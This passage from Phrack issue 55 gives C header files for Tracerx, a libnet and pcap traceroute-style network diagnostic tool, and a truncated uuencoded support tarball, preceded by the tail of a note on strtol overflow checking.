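Checking `end` before `errno` matters: strtol leaves `end` past every digit it consumed even when it overflows, so a string that both overflows and carries trailing junk is reported as junk, and one that is merely too large is reported as overflow rather than being silently clamped to LONG_MAX. Calling strtol with base 0 instead would also accept octal (`010` would become 8), which is why the prefix is handled by hand.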
<-->
<++> P55/Tracerx/tx_error.h !b56cc374
/*
* $Id: tx_error.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* Error handling routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_ERROR_H
#define _TX_ERROR_H
#define WARNING 0x1
#define CRITICAL 0x2
#define FATAL 0x4
void
tx_error(
int,
char *,
...
);
#endif /* _TX_ERROR_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_struct.h !20e7682d
/*
* $Id: tx_struct.h,v 1.2 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tracerx structure prototypes
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#ifndef _TX_STRUCT_H
#define _TX_STRUCT_H
#include <unistd.h>
#include <pcap.h>
#include <libnet.h>
/*
 * Tracerx control structure.
 */
struct tx_control
{
    u_char tx_flags;                /* internal flags */
    u_char *device;                 /* device to use */
    u_char *tx_packet;              /* pointer to the packet */
    u_short ip_tos;                 /* IP type of service */
    u_short ip_df;                  /* IP dont fragment */
    u_short burst_rate;             /* burst rate */
    u_short current_ttl;            /* current IP TTL */
    u_short max_ttl;                /* max IP TTL */
    u_short initial_sport;          /* initial source port */
    u_short initial_dport;          /* initial destination port */
    u_short id;                     /* tracerx packet ID */
    u_short use_name;               /* use domain names or dotted decimals */
    u_short packet_size;            /* total packet size */
    int packet_offset;              /* IP packet offset */
    int protocol;                   /* transport protocol in use */
    int probe_cnt;                  /* number of probes to send per round */
    int verbose;                    /* verbose mode */
    int reading_wait;               /* network reading wait */
    int writing_pause;              /* network writing pause */
    u_long host;                    /* destination host */
    u_long packets_sent;            /* packets sent */
    u_long packets_reply;           /* packets we got replies back */
    struct sockaddr_in sin;         /* socket address structure */
    struct libnet_link_int *l;      /* libnet packet injection structure */
    pcap_t *p;                      /* pcap packet listening structure */
};

/*
 * Packet payload.
 */
struct tx_payload
{
    u_char seq;                     /* packet sequence number */
    u_char ttl;                     /* TTL packet injected with */
    struct timeval tv;              /* time vector */
};
#define TX_P sizeof(struct tx_payload)
#endif /* _TX_STRUCT_H */
/* EOF */
<-->
The following tarball contains the tracerx support files including the autoconf
files and documentation.
<++> P55/Tracerx/tracerx-package.tar.gz.uue !bddbaa9f
begin 644 tracerx-package.tar.gz
M'XL(")M)V#<``W1R86-E<G@M<&%C:V%G92YT87(`[%QK5]M(DYZOZ%?T,-G!
M]L'RE9O)!6-,\+Q@.+9AR"%YC2RW;0VRI-4%S"3Y[_M4MR3+M\#,3K)GSXO.
MC&UU=U5755=7/=42.=/N^,`PN6I8/WVO*U_(Y[?+Y9_R\J+OPLY6/KHOYK<+
M/^6W=[:W\^5"OKB-]@+:T/_=)$I<@>=K+J9T;=O_UCC7#GS^(P3ZL=<ORB^,
ML5>-?H6=35UA\YX5U"(K[.WMY?+;N7R)%8N5_'9EJ\"